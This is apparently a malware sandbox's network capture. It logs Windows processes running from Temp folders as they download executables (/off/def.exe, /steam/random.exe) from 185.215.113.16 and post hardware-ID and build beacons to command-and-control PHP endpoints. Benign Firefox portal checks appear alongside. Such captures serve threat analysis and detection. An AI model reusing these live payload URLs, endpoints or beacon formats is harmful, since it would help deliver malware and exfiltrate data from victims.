Dec 16, 2024 11:04:28.539813995 CET	672	IN	Data Raw: d8 08 e3 dd 10 34 5a 6e 1a 3d db 47 e3 2d 96 c6 3b bb 70 cb 84 21 33 fb 24 10 1c 0d 5f 09 34 28 c9 05 72 7d ce f9 6d 12 ca 1f ec f6 4b 83 9b eb 95 f3 bb 47 40 8a cc 1e 9f 20 cd d4 c0 46 35 68 3e 94 6a 18 38 a9 b3 eb 14 51 c6 53 9c cd 80 ad 1c 04 Data Ascii: 4Zn=G-;p!3$_4(r}mKG@ F5h>j8QSN&"`i"E]t6q"odnS<,<M[F~Y}F &!3jb<C$6bm-3U7CQa%Sb#%SGAu2o
Dec 16, 2024 11:04:28.539829969 CET	1236	IN	Data Raw: 76 45 0d 0c 57 3d 7a d6 ea 9c c8 eb b4 55 53 08 a2 df dd 6a b0 e1 ba 0a d7 45 87 6b d4 6e be ea ed 84 c6 34 05 29 c3 e2 fc e4 7b f7 20 f1 ba 15 01 85 4d 17 aa 21 55 65 d8 4d fd e2 f8 d5 df 36 a5 ca 4b 27 1a 21 d0 32 cf 33 cd 0a ec f9 ce 68 0f fd Data Ascii: vEW=zUSjEkn4){ M!UeM6K'!23hmDv'u/5`a{g8~=Ug pI@xjmX}F&DOgfCsf%}x!h$(-)i{]etzoJU5fQ"4hW[Bdh%H
Dec 16, 2024 11:04:28.539844036 CET	224	IN	Data Raw: f7 4c d4 ba 97 22 51 ca f9 ae 5a 42 fa 32 ec f1 44 08 40 7e 98 4e 69 1f 08 9e 03 bc 14 1a 02 8c a3 04 1d b3 40 62 60 e5 58 13 a2 55 2d 22 05 58 dc 79 9c e3 ce 08 a1 16 c1 d5 8f 6a d0 9e b3 98 9d 04 ca 02 19 c1 fa 0b cd 24 41 83 ef 01 fd 9b 4b b2 Data Ascii: L"QZB2D@~Ni@b`XU-"Xyj$AK(8tl+lIgyv_(yy=3rDy+8AVvSAya)$9I29T6,M3)=E{bX53}$6s>L<
Dec 16, 2024 11:04:28.539896965 CET	1236	IN	Data Raw: 7d 6b 7f 93 7a 87 f5 0e 3d 0a a1 d3 84 4a 93 eb 26 b9 52 69 d5 1d f5 0c 9f eb 81 31 9e e6 f9 c2 93 e1 04 3c f7 13 4f bb c6 21 c8 07 97 b7 78 a8 a7 61 88 7c 8d 28 fc 12 b0 0b f7 05 2b 29 ff 18 9f 84 b1 58 10 c4 1c 0d c1 e3 17 0a c0 05 13 12 bd f2 Data Ascii: }kz=J&Ri1<O!xa\|(+)X_/``zAmRAgxHIs6YuN(BHKe\|P&HI_z9f/UYKAjV=cAd"3E!?LJ&uu5sT'B
Dec 16, 2024 11:04:28.540005922 CET	1236	IN	Data Raw: eb 32 d3 16 3f e0 de 71 f7 88 b0 9c 58 7a 03 a0 d6 69 71 59 33 6d a5 d9 26 58 b1 0b b7 57 eb 85 54 92 38 de 46 e0 7b 59 94 bf bf eb bd 41 5b 81 e5 69 a0 9a b7 cf da a2 f8 17 02 4b fa 25 a1 3a 0e 5d 82 6c f5 79 32 eb 4f fc d6 18 56 6c f8 ec 0a f9 Data Ascii: 2?qXziqY3m&XWT8F{YA[iK%:]ly2OVlGoUw/d#H\|xyw*H1)&Y5FD?_"Tv,L o$z8`cT{wj{g39[-y'8n>g\|(K,,E_,(1YP9XB(ef
Dec 16, 2024 11:04:28.659657001 CET	1236	IN	Data Raw: 01 39 53 58 f0 c3 af 92 89 5b 52 f6 2d 69 86 2e 00 42 92 8b dc b0 c7 82 76 0e 00 3a c5 59 bc 65 f5 12 6a c4 3d fa 7f b2 08 27 c1 04 37 87 bc 6b b7 25 cf f6 bb 2b 47 ee 34 dc 9e 8a 26 10 c5 84 95 95 51 59 61 c8 30 0c e4 8e fa e3 b6 90 04 84 1e fc Data Ascii: 9SX[R-i.Bv:Yej='7k%+G4&QYa0t9rE2"0XUEe4mm,tF4S/MFks&LrxNy6D8SsS)+2#lgH@V6S226

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	50052	185.215.113.16	80	6256	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:27.857645988 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Dec 16, 2024 11:04:29.192388058 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:04:28 GMT Content-Type: application/octet-stream Content-Length: 2786816 Last-Modified: Mon, 16 Dec 2024 09:28:04 GMT Connection: keep-alive ETag: "675ff2a4-2a8600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 58 b2 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ @+X`Ui` @ @.rsrc`2@.idata 8@tzzztmlq@$:@jxlaistz ^@.taggant@+"d@
Dec 16, 2024 11:04:29.192433119 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:29.192456007 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:29.192565918 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:29.192584038 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:29.192600965 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:29.192619085 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:29.192785025 CET	1236	IN	Data Raw: 97 64 cd f4 af ff cf ad 38 30 ce 35 28 e6 f0 e3 9c bb ea d3 55 19 fa 93 6b 76 1c b7 fe b9 8b c1 50 e8 21 50 01 d7 4a 14 a1 af 10 de d1 1d 60 b4 05 75 b0 e3 49 6a d9 97 36 17 d3 99 06 6d 95 c2 11 62 c0 f3 af 6b c4 fb 5b 46 ad 9d 2c 40 d3 44 79 87 Data Ascii: d805(UkvP!PJ`uIj6mbk[F,@Dy:`AZ,hc0cCdS%Fk9DI8yY-CCf$E=OWr>0#N.[e#"1bY@5UWlBlJl9C-3bY
Dec 16, 2024 11:04:29.192800999 CET	1236	IN	Data Raw: 8c 63 b6 fd f3 63 b2 d1 9c 90 2d de 2e 48 bc 66 75 50 c0 d9 a7 19 1a d7 65 eb 11 ee 13 28 c2 f4 75 50 02 d4 97 08 fe f2 a4 59 44 76 13 63 f6 f3 75 04 b6 25 a8 2c e6 df 61 bf df 19 7c 48 5a bf a5 47 22 3a 2e e4 c8 6b 13 e8 a9 f4 b5 37 42 46 bd a0 Data Ascii: cc-.HfuPe(uPYDvcu%,a\|HZG":.k7BF9I24@RcN[uBNj=%y}uP~z\|yK.qi<b@?4d PAH%EQp2c<17L\}TS;\[(3`.P4lKB<
Dec 16, 2024 11:04:29.192819118 CET	1236	IN	Data Raw: 54 42 bd ee a9 20 b6 c2 48 0b 86 f4 40 8c ca 60 42 59 b8 25 84 73 12 8f 2f fe 0a 17 63 80 e0 8f 59 4b 0c 25 42 df 17 b1 86 fd 60 c3 15 3a 01 7f 45 68 e2 03 34 09 45 12 06 58 5c 12 57 f9 e5 3a bd 73 ea e6 07 fd f1 ec 44 b2 21 f5 bb d3 9c 41 f8 8e Data Ascii: TB H@`BY%s/cYK%B`:Eh4EX\W:sD!AT+DKivM\|^G%x6scRJbMRU<5rM_ZrrgOp9c6 cP2Wo3HZ6\7\|nWD9TJ3
Dec 16, 2024 11:04:29.312292099 CET	1236	IN	Data Raw: 3b 2b 6d 8a 1d 3c db b9 21 c0 d0 b0 da 5c 18 d5 31 73 cc 34 31 3c f6 c5 26 52 6a 0e 35 6b 6f e5 31 6c f4 e7 76 37 28 83 a8 7f 5e 1f 53 a9 b8 66 7c a6 dd f0 54 0a ae b5 75 5a c8 00 5c f7 e9 e7 2b 05 f0 f2 61 f9 f4 a6 f5 43 cf 84 e5 0d eb 32 55 80 Data Ascii: ;+m<!\1s41<&Rj5ko1lv7(^Sf\|TuZ\+aC2U~+aG'9868sFIHlz=8lM/N.bHChZ'a,Q/-PgLCcMW;2R+j_DEywI
Dec 16, 2024 11:04:41.092046976 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Dec 16, 2024 11:04:41.535056114 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:04:40 GMT Content-Type: application/octet-stream Content-Length: 1854976 Last-Modified: Mon, 16 Dec 2024 09:29:36 GMT Connection: keep-alive ETag: "675ff300-1c4e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 30 6b 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 6b 00 00 04 00 00 82 2e 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds\|Fir^m[gmKbgdwwEeRichdPELdTg*0k@`k.@M$a$$ $h@.rsrc$x@.idata $z@ +$\|@qlmsectipP~@gcgddbmv k&@.taggant00k",@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	50057	34.107.221.82	80	6548	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:28.707901001 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:04:29.793399096 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69842 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 16, 2024 11:04:31.154297113 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:04:31.469924927 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69844 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 16, 2024 11:04:31.804115057 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:04:32.118570089 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69844 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	50062	185.215.113.206	80	8084	C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:29.119791031 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 16, 2024 11:04:30.451307058 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 16, 2024 11:04:30.454571962 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBFCFIEBKEGHIDGCAFBF Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 42 46 43 46 49 45 42 4b 45 47 48 49 44 47 43 41 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 38 41 42 35 37 45 39 31 31 39 33 34 36 38 35 35 32 38 34 39 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 46 49 45 42 4b 45 47 48 49 44 47 43 41 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 46 49 45 42 4b 45 47 48 49 44 47 43 41 46 42 46 2d 2d 0d 0a Data Ascii: ------FBFCFIEBKEGHIDGCAFBFContent-Disposition: form-data; name="hwid"1D8AB57E91193468552849------FBFCFIEBKEGHIDGCAFBFContent-Disposition: form-data; name="build"stok------FBFCFIEBKEGHIDGCAFBF--
Dec 16, 2024 11:04:30.895299911 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50068	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:31.138627052 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 65 31 3d 31 30 31 36 30 34 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1016048001&unit=246122658369
Dec 16, 2024 11:04:32.472899914 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:04:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50072	34.107.221.82	80	6548	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:31.379920006 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50078	34.107.221.82	80	6548	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:31.891263962 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50090	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:34.258550882 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:04:35.591922998 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:04:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50095	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:37.231272936 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:04:38.567399025 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:04:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50100	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:40.360332012 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:04:41.650983095 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:04:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50102	185.215.113.16	80	2876	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:42.234147072 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Dec 16, 2024 11:04:43.561557055 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:04:42 GMT Content-Type: application/octet-stream Content-Length: 2786816 Last-Modified: Mon, 16 Dec 2024 09:28:04 GMT Connection: keep-alive ETag: "675ff2a4-2a8600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 58 b2 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ @+X`Ui` @ @.rsrc`2@.idata 8@tzzztmlq@$:@jxlaistz ^@.taggant@+"d@
Dec 16, 2024 11:04:43.561613083 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:43.561647892 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:43.561799049 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
